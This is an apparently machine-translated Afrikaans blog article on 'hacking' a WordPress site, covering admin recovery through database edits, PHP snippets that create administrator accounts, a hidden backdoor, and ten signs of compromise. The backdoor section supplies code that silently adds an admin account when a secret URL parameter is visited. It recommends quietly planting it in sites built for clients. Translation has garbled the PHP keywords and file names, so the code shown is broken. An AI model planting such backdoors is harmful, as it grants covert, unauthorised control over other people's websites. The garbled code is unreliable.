Hoe u ‘n volledige webwerf op WordPress kan hack;

Hoe u op 'n WordPress-webwerf, die volledige gids, kan hack


Ons mag geen onwettige of kwaadwillige gedrag kondoneer, goedkeur of aanmoedig nie! Die doel van hierdie artikel is om te verduidelik hoe u toegang tot ‘n WordPress-webwerf wat aan u behoort, kan hack of herwin, of dat u die regte het om te redigeer, admin en toegang te verkry. Wat jy ook al doen, jy doen dit op jou eie. Ons is nie verantwoordelik vir u optrede nie. Hierdie gids dien slegs vir opvoedkundige doeleindes.

Beskrywe metodes sal u help om toegang tot die webwerf te herwin, selfs al het u nie meer ‘n rekening nie, maar u sal inligting benodig oor die webwerf en dit sal u nie help om aan enige willekeurige WordPress-installasie deel te neem nie.

In hierdie gids gaan ons u wys:

  • Hoe u op ‘n WordPress-webwerf kan hack
  • Hoe om ‘n agterdeur in WordPress te skep
  • Hoe u ‘n nuwe gebruikersrekening via FTP kan skep
  • 10 tekens dat u WordPress-werf gehack is

Hoe u op ‘n WordPress-webwerf, die volledige gids, kan hack

Situasies waarin u uself kan help

As u in een van die volgende situasies is, sal ons metodes u help om toegang te verkry:

  • jy het die gebruikersnaam of e-posadres vergeet
  • herstel wagwoord opsie werk nie op die hosting server nie
  • herstel wagwoord e-pos nie deur nie
  • het u nie meer toegang tot die e-posadres van die rekening nie
  • u ken die gebruikersnaam en wagwoord, maar die kombinasie werk net nie

U benodig die metodes hieronder beskryf slegs een van die volgende:

  • FTP toegang tot die bediener, of
  • cPanel toegang tot die bediener, of
  • toegang tot die MySQL-databasis en die vermoë om op afstand aan te sluit

Metode # 1 – die MySQL-manier

Gebruik hierdie metode om die wagwoord (of gebruikersnaam indien nodig) van ‘n bestaande gebruiker te verander of om ‘n nuwe rekening te skep. U het cPanel-toegang of direkte MySQL-toegang tot die databasis van die webwerf nodig. Laat ons begin deur die wagwoord van ‘n bestaande gebruiker te verander.

As u cPanel gebruik, kan u aanmeld (cPanel kan altyd verkry word via die https://yoursite.com:2083 skakel), soek en open phpMyAdmin. Die lys databasisse en tabelle is aan die linkerkant. U soek die tafel waarin u eindig _users. Dit sal waarskynlik wees wp_users, maar as u meer as een WordPress-webwerf op die bediener het, moet u die regte een vind.

Die regte tabel bevat die gebruiker wat u wil redigeer. Volg dieselfde prosedure as u via een of ander eksterne kliënt wil koppel aan MySQL SQLyog. Sodra u die tabel en die werklike gebruikersrekord opspoor, is dit tyd om die wagwoord te verander.

Soos u sekerlik nou al agtergekom het, word die wagwoord in die user_pass veld, gebruik die MD5-algoritme. Maak die oop aanlyn MD5 kragopwekker tik die wagwoord in wat u wil gebruik en klik op “Hash”. Kopieer die gegenereerde string en vervang die oorspronklike wagwoord daarmee. In phpMyAdmin kan u die veld wysig deur daarop te dubbelklik. Die prosedure is soortgelyk aan ander MySQL-kliënte. Stoor veranderinge en teken aan met WordPress met u nuwe wagwoord.

WP-gebruikerstabel

Gebruikernaam, wagwoorde en e-posadres is in die wp_users databasis tabel

Nog steeds op metode 1 – om ‘n nuwe gebruiker te skep

Die skep van ‘n nuwe gebruiker is ‘n bietjie ingewikkelder, maar dit kan binne minder as ‘n minuut steeds hanteerbaar wees. Skep ‘n nuwe rekord in gebruikers-tabel en bevolking: user_login, user_pass (hashed, met behulp van die MD5-funksie hierbo beskryf) en user_email. Alle ander velde kan leeg bly; hulle maak nie saak nie. Stoor die nuwe rekord. Sodra dit gestoor is, sal MySQL dit ‘n unieke ID gee. Dit is die nommer in die ID-veld. Onthou dit.

Gaan nou na _usermeta tafel. onthou, die voorvoegsel van die tabel moet dieselfde wees as die gebruikers se een. Byvoorbeeld wp_users en wp_usersmeta. As die voorvoegsel nie dieselfde is nie, wysig u die verkeerde tabel (van ‘n ander WP-installasie) en sal die nuwe rekening nie werk nie. Ons sal twee nuwe rekords skep. Ignoreer die umeta_id veld vir albei. stel USER_ID veld na die waarde wat u so pas onthou het (die nuwe ID-waarde in die tabel vir gebruikers). Vir die eerste versameling meta_key om wpct_user_level en meta_value om 10. Vir die tweede een meta_key om wpct_capabilities en meta_value om 'n: 1: {s: 13: "administrateur"; b: 1;}. Stoor albei. Jy is klaar – teken aan!

Metode # 2 – die funksies.php manier

Hierdie benadering kan gebruik word deur funksies te wysig.php deur cPanel of deur ‘n FTP-kliënt te gebruik. As u cPanel gebruik, soek File Manager en maak dit oop. Eerstens moet ons die gids van die aktiewe tema vind.

Gaan na public_html / wp_content / temas gids. As u dadelik u tema sien en weet watter een dit is – wonderlik. Maak die lêergids oop en begin redigeer functions.php. Indien nie, maak die webwerf oop, klik dan met die rechtermuisknop op enige plek, kies dan “View source”. Druk dan Ctrl + F en begin tik /temas/ binnekort sal baie URL’s uitgelig word, en jy sal die gidsnaam van die aktiewe tema herken.

Soek dit in die lêerstruktuur, maak dit oop en begin redigeer functions.php. Kopieer / plak die volgende kode aan die einde van die lêer. Let op die afsluiting ?> PHP-etikette as u dit het. Hulle moet op die laaste lyn wees. Sit dus die kode voor hulle in.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! gebruikersnaam bestaan ​​($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'bynaam' => $ new_user_email));

$ gebruiker = nuwe WP_User ($ user_id);
$ Gebruikersvriendelike> set_role ( 'n administrateur ');
}

Wysig slegs die eerste twee reëls van die kode om u nuwe rekening weer te gee. As daar reeds ‘n gebruiker in WP is met daardie e-pos, sal ‘n nuwe rekening nie geskep word nie, maak dus seker dat dit nuut is. Verander ook die wagwoord – moenie deur ‘n skrip-kiddies gekap word nie. Nadat u die lêer gestoor het, maak u webwerf eenvoudig oop, dan word die kode uitgevoer, ‘n nuwe rekening met administrateurvoorregte geskep en u kan daarmee aanmeld.

Nadat u dit gedoen het, moet u onthou om die kode uit te vee functions.php.

Ander inbraakmetodes

Deur die FTP-, cPanel- of MySQL-wagwoord te ken, bewys u dat u wettige toegang tot die bediener het en daarom ook toegang tot die WordPress-installasie (s) moet hê. As u nie een van hierdie rekeninge het nie, is dit tot u voordeel (om by ander mense-webwerwe in te kap), en dit is nie lekker nie!

Onthou dat die verkryging van ongemagtigde toegang tot rekenaars, webwerwe of bedieners ‘n ernstige misdaad is en dat dit onmiddellik in die meeste lande hanteer word.

As u bang is dat u WordPress-webwerf gekap kan word, kyk gerus na hierdie bladsy met gratis WordPress-sekuriteitsskandeerder. As u nie tyd het om u blog op te stel nie, laat ons dit dan vir u doen.

Hoe om ‘n agterdeur in WordPress te skep

As die voordeur gesluit is, kan u die agterdeur probeer. Dit klink miskien na ‘n kwaadwillige manier om die kode te gebruik om die webwerf binne te gaan sonder om toegang daartoe te hê, maar daar is wel tye dat u u eie webwerf moet beheer as iemand dit gesteel het..

As dit webwerwe skep vir ander mense wat u doen, sal daar vroeër of later ‘n kliënt wees wat sal weier om u vir u werk te betaal; ‘n kliënt wat u aanmeldinligting uitvee en die beheer oorneem van alles wat u gedoen het. Soms is dit genoeg om ‘n nuwe gebruiker via FTP te skep of om ‘n wagwoord terug te stel. As dit nie genoeg is nie, wil u dalk u weg binnetoe of ‘n toegang tot die agterdeur tot u adminbladsye skep.

Maar as u besluit het om ‘n klein stukkie kode in u WordPress-omgewing weg te steek, kan u uself waardigheid bespaar en verkry toegang tot die WordPress-werf met administratiewe regte. En dit is waar die speletjies begin.

Dit maak nie saak hoeveel keer hierdie dief jou inligting uitvee of ‘n rugsteun herstel op ‘n bediener wat hy waarskynlik besit nie, die kans is goed dat hy niks van agterdeur-ingange weet nie. As hy dit gedoen het, sou hy u hulp waarskynlik nie eers nodig het om WordPress op te stel nie, reg?

Skep ‘n agterdeur:

OK, genoeg met die praatjie; hier is ‘n stuk kode wat u nodig het om die werk af te handel:

  1. Maak die files.php-lêer oop
  2. Kopieer / plak die volgende kode:
  3. add_action ('wp_head', 'wploop_backdoor');
    funksie wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knockknock') {
    vereis ( 'WP-sluit / registration.php');
    As (! Gebruikersnaam bestaan ​​('gebruikersnaam')) {
    $ user_id = wp_create_user ('naam', 'slaag');
    $ gebruiker = nuwe WP_User ($ user_id);
    $ Gebruikersvriendelike> set_role ( 'n administrateur ');
    }
    }
    }
    ?>
  4. Stoor veranderinge

As u die kode laat soos dit is, sal u slegs hoef te doen om ‘n nuwe admin op die webwerf te skep http://www.yourdomain.com/?backdoor=knockknock

Nadat die bladsy gelaai is, is u nuwe gebruikersnaam “Naam” en wagwoord “Slaag”.

Natuurlik, u kan dit in die kode verander hierbo deur ‘naam’ en ‘pas’ te verander na wat u wil. U kan ook die skakel na u agterdeur verander deur ‘agterdeur’ en / of ‘klopknop’ te verander na enigiets waarmee u vorendag kom..

Probeer die funksie – nie net dit is lekker nie, maar dit kan jou regtig help om iewers in die toekoms wanneer jy op die punt staan ​​om ‘n webwerf te maak vir iemand wat jy nie heeltemal kan vertrou nie. U moet ook u WordPress- en blogvaardighede verhoog.

Hoe u ‘n nuwe gebruikersrekening via FTP kan skep

Die skep van nuwe gebruikersrekeninge op WordPress is baie maklik. As administrateur moet u navigeer na Gebruikers admin bladsy waar u ‘n nuwe rekening vir enige gebruikersrol kan skep. Dit kan binne ‘n paar sekondes gedoen word en ‘n nuutgeskepte gebruiker kan onmiddellik aanmeld met die gegewe gebruikersnaam en wagwoord.

Maar wat gebeur as u toegang tot u WordPress-admin verloor? Dinge kan ‘n bietjie ingewikkelder raak, maar moenie bekommerd wees nie – ons het ‘n funksie vir u wat u administratiewe lewe kan red.

Of ‘n ander administrateur u rekening uitgevee het, of u al die gebruikers per abuis uit die databasis verwyder het, ‘n foutiewe plugin gebruik of gekap het, u kan steeds weer in beheer kom. Soms kan u moontlik slegs toegang tot u FTP-bediener kry, terwyl die HTTP-een buite u bereik is en u ‘n nuwe admin moet skep. Alhoewel dit ‘n seldsame geval kan wees, sal die volgende funksie u red.

Om ‘n nuwe rekening buite die WordPress-adminomgewing te skep, al wat u benodig is ‘n FTP-toegang tot u webwerf. As administrateur moet u al die nodige inligting hê om by u bediener aan te meld en u kan vinnig ‘n nuwe rekening skep deur ‘n nuwe funksie in u tema te skep.

Skep ‘n nuwe gebruikersrekening via FTP:

  1. Maak FTP-kliënt oop en maak verbinding met u rekening
  2. Gaan na wp-inhoud / temas
  3. Maak die lêergids oop met die tema wat u gebruik
  4. Soek na die file.php-lêer en wysig dit
  5. Kopieer en plak die volgende funksie:
  6. funksie admin_account () {
    $ user = 'Gebruikersnaam';
    $ pass = 'Wagwoord';
    $ email = '[email protected]';
    if (! gebruikersnaam_bestaan ​​($ gebruiker) &&! e-posbestaan ​​($ e-pos)) {
    $ user_id = wp_create_user ($ gebruiker, $ pas, $ e-pos);
    $ gebruiker = nuwe WP_User ($ user_id);
    $ gebruiker-> set_role ('administrateur');
    }}
    add_action ( 'init "," admin_account');
    
  7. Verander gebruikersnaam, wagwoord en e-pos na iets unieks
  8. Stoor veranderinge

Sorg dat gebruikersnaam, wagwoord en e-posadres wat u in die funksie opgestel het, uniek is anders werk die funksie nie behoorlik nie. Sodra u die veranderinge gestoor het, is u klaar en kan u na u WP-aanmeldpaneel gaan. Gebruik nuwe inligting om weer aan te meld en sodra u die rekening geverifieer het, kan u die funksie uit die funksies.php-lêer uitvee.

Die funksie hierbo wys ‘n admin-rekening, maar u kan dit maklik verander om ‘n rekening met enige ander gebruikersrol te skep. eenvoudig verander die rol op die 8ste ry van die kode aan die redakteur, outeur, bydraer, intekenaar of enige ander gebruikersrol wat u geskep het.

Ongelukkig, as u u admin-rekening verloor het, het u ook al die poste wat onder daardie gebruikersnaam geskryf is, verloor. Daarom moet u altyd ‘n rugsteun hou wat u maklik kan opspoor. As u dit lees terwyl u u admin-rekening het, neem dit as ‘n herinnering om onmiddellik ‘n rugsteun te skep en boekmerk hierdie artikel net vir ingeval u in die toekoms ‘n rekening buite WordPress moet skep.

10 tekens dat u WordPress-werf gehack is

WordPress is ‘n groot blogplatform. Daar is miljoene gebruikers en dit wil voorkom asof die getal elke dag vinnig groei. Mense is selfs geneig om hul webwerwe wat in ander inhoudbestuurstelsels geskep is, meer gereeld na hierdie open source-stelsel oor te plaas as wat u dink. En hoewel dit goed is, beteken dit dit hackers sal WordPress ook op nommer een plaas as hulle probeer om ewekansige webwerwe binne te val.

As u gekap word, sal u dit dadelik weet. U webwerf sal ontoeganklik word; jy kan nie aanmeld nie en soms sal ‘n hacker selfs ‘n boodskap op die voorblad agterlaat. Maar meer gereeld as nie, sal jy dalk nie eens agterkom dat iets verander het nie. In hierdie deel van die artikel is ons op die punt om u verskeie tekens te wys wat u kan wys dat u WordPress-webwerf gekraak is en ‘n paar oplossings vir die probleem.

1. Onsuksesvolle aanmelding

Hierdie teken is baie duidelik. As u ‘n geruime tyd ‘n gebruikernaam- en wagwoordkombinasie gebruik het sonder om ooit probleme te hê, kan u agterdogtig raak as WordPress u skielik nie u rekening herken. As ‘n hacker by u webwerf moet aanmeld, is die kans goed dat hy u administrasie-regte vinnig sal verander.

Miskien moet hy u wagwoord verander of u rekening heeltemal verwyder. Voordat u begin paniekerig raak na die eerste keer dat WordPress u oor verkeerde gebruikernaam / wagwoord boodskappe stuur, moet u asseblief die feit oorweeg dat u ‘n verkeerde kombinasie ingevoer het, of dat u die kapsluitknop aanskakel het..

oplossing: Probeer om die wagwoord via e-pos te herwin of gebruik ‘n ander rekening om weer aan te meld. Om aan te meld dat u veilig bly, beveel ons aan dat u dit installeer Teken in Ninja plugin vir WordPress.

2. Kwaadwillige inhoud word by u webwerf gevoeg

Die webwerf bevat 'n waarskuwing oor malware

As u onbekende inhoud op u webwerf begin opmerk, kan u dit bekommer. As hulle ‘n kans kry om toegang tot u administrasiegebied te kry, hackers sal in staat wees om u kern- en sowel die tema- as plugin-lêers te verander. Dit beteken dat hulle alles wat hulle wil verander, kan verander.

Sommige hackers sal die voorkoms van u webwerf drasties verander en miskien selfs uitspel dat u gekap is, maar die ander is baie subtieler daaroor.

oplossing: Probeer verborge inhoud in die webwerf-kode soek. Daar is dalk skakels na kwaadwillige webwerwe wat in die bladsyvoet van u webwerf geplant is, of hulle kan pop-up-vensters geïnstalleer het wat gereeld vir u kliënte beskikbaar sal wees. Gebruik Security Ninja om u webwerf te skandeer of u webwerf deurlopend te monitor vir sulke probleme.

3. Verdagte besoeke

As u nie u webwerf dop nie, moet u dit onmiddellik doen. ‘N Eenvoudige manier om dit te doen is om Google Analytics te gebruik, wat, onder baie ander funksies, kan vertel hoeveel besoeke u kry en waar kom die besoeke vandaan. Na ‘n geruime tyd leer jy jou webwerf ken. Dit beteken dat u sal weet waar die besoeke vandaan kom, dat u sal weet wanneer u ‘n nuwe veldtog begin en wanneer daar nuwe promosie-skakels in die natuur vrygestel word..

Maar as u skielik agterkom dat u webwerf ‘n groot aantal nuwe besoeke van die verdagte domein kry, sal u dit verder wil ondersoek, want u werf kan dalk net gekap word. Gewoonlik sal die soort besoeke lei tot ‘n 100% -bonspoed, wat beteken dat slegs een bladsy verkry is. Hackers sal gereeld outomatiese stelsels gebruik wat ander slegte werwe na uwe sal lei. Of dit nou die slegte kode is wat op u werf uitgevoer word of dat u ‘n deel van ‘n strooiposnetwerk geword het, dinge kan ernstig raak, en u moet op u werf na kwaadwillige kodes kyk..

oplossing: Gebruik Google Webmeesters gereedskap om verdagte domeine te vind

4. ‘n Skielike daling in verkeer

Veilig blaai op die webwerf

In teenstelling met laasgenoemde teken dat u gehak word, kan hierdie een u dalk waarsku omdat daar skielik ‘n daling in die aantal besoeke is. In plaas daarvan om nuwe besoeke na u te verwys, kan ‘n hacker besoeke van u webwerf af stuur. Dit kan gebeur omdat ‘n hacker u webwerf na ‘n ander een herlei het. Die ander rede om minder besoekers te kry, is dat Google u webwerf swartlys gelys het. Hierdie aksie wys ‘n boodskap aan elke gebruiker wat kan kies om nie u webwerf oop te maak nie omdat dit besmet is.

oplossing: Gebruik Google’s Veilig blaai webwerf status om te kyk of u webwerf as onveilig gemerk is en tans gevaarlik is om te besoek.

5. Die resultate van die soekenjin is vreemd

As u geen veranderinge op u webwerf opgemerk het nie, maar u wel agterkom dat die resultate in Google en ander soekenjins vreemd is (toon verskillende titels en ander metadata), kan dit ‘n duidelike teken wees van ‘n gehackte webwerf. ‘N Hacker kan u inhoud verander op ‘n manier wat slegs vir ‘n kundige sigbaar is. Tog is die verandering sigbaar in die resultate van die soekenjin.

oplossing: Kyk na u webwerf met Google Webmeesters gereedskap, en kyk of u webwerf hiermee gekap is gratis aanlyn hulpmiddel.

6. U kan nie e-pos stuur / ontvang nie

Sodra ‘n hacker toegang tot u webwerf kry, sal hy dit waarskynlik wil doen gebruik u bediener om almal anders te strooi. As u agterkom dat u nie nuwe e-pos vanaf u WordPress kan stuur of ontvang nie, kan dit ‘n duidelike teken wees dat u gekap is. Kontroleer u e-pos weer en kontroleer dit dan met u verskaffer om seker te maak dat daar nie foute is nie.

oplossing: Toets u WordPress posfunksie met hierdie gratis inprop.

7. Webwerf bestaan ​​nie

Bediener nie gevind

Daar is tye dat hackers nie toegang tot u webwerf verkry om kwaadwillige kode te plant, gebruikers te herlei of om u e-pos vir strooipos te gebruik nie. soms, al wat hulle wil doen, is om u webwerf te verongeluk. Selde sal ‘n hacker alles suksesvol van die hele bediener verwyder. Daarom is dit belangrik dat u u lêers by ‘n bekende gasheerfirma huisves wat sekuriteit benodig en ook daaglikse of minstens weeklikse rugsteun van u webwerf hou. Dit is ‘n goeie praktyk dat u van tyd tot tyd u eie rugsteun doen, sodat die webwerf vinnig herstel kan word.

oplossing: Installeer een van die beste plugins vir rugsteenbestuur in WordPress.

8. Verdagte lêers

Soortgelyk aan kwaadwillige inhoud wat by bestaande lêers gevoeg kan word, ‘n Hacker plant moontlik ekstra lêers op enige plek in u wortelmap. Dit is ‘n goeie ding om jou deur WordPress te leer ken, maar as jy nie so ervare is nie, moet jy ‘n veiligheidsinstrument hê wat al jou lêers en aktiwiteite kan nagaan. Onlangs het ons die Security Ninja nagegaan, wat ‘n perfekte hulpmiddel is om al u WordPress-lêers na te gaan.

oplossing: Probeer lêers soek wat nie by u WordPress-installasie behoort nie. Gebruik Security Ninja om u webwerf gereeld te skandeer en vind daardie lêers outomaties. Vee dan die lêers uit of verwyder die kwaadwillige kode van besmette lêers. Moenie die Core Scanner-byvoeging vir Security Ninja vergeet nie.

9. Nuwe lede

Afhangend van u webwerf, is u miskien die enigste een wat nuwe lede kan byvoeg. In daardie geval kan ‘n e-pos wat u oor nuut geregistreerde gebruikers vertel, ‘n alarm veroorsaak. As daar ander administrateurs is wat die vermoë het om nuwe lede by te voeg, moet u dit met verdagte aktiwiteite ondersoek.

oplossing: Verander aanmeld-URL met ‘n gratis inprop, beperk toegang tot u WordPress-aanmeldbladsy deur die .htpasswd-lêer te gebruik en gebruik Login Ninja om u aanmeldingsvorm heeltyds te beskerm.

10. Kyk na die geskeduleerde gebeure op u bediener

Soms doen ‘n hacker nie ‘n ding aan u webwerf sodra hulle hul weg gevind het nie. In plaas daarvan, hulle sal geskeduleerde geleenthede verlaat wat u webwerf soms in die toekoms kan benadeel. Hierdie tegniek is gevaarlik omdat ‘n hacker die onervare slagoffer aanvanklik leeg kan laat. U kan besmet wees en weet niks daarvan nie.

oplossing: Gaan jou CRON-take na op ‘n bediener wat jy gebruik en maak seker dat daar geen verdagte geskeduleerde take is nie.

Klaar maak

Ons hoop dat hierdie artikel u sal help om selfs ‘n veiliger WordPress-webwerf te bestuur, en dat dit u sal help om toegang tot dit te verkry in slegte situasies. en selfs as u werf skoon is, moet u dit nie as vanselfsprekend aanvaar nie.
Maak altyd seker dat u blog so veilig is as wat dit kan wees. Ons stel beveiligingsplugins vir WordPress voor wat u op die meeste tye kan bespaar. Moenie steeds die een gebruik wat onveilige wagwoord gebruik nie, en wees versigtig as u op u eie WordPress-webwerf inbraak.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map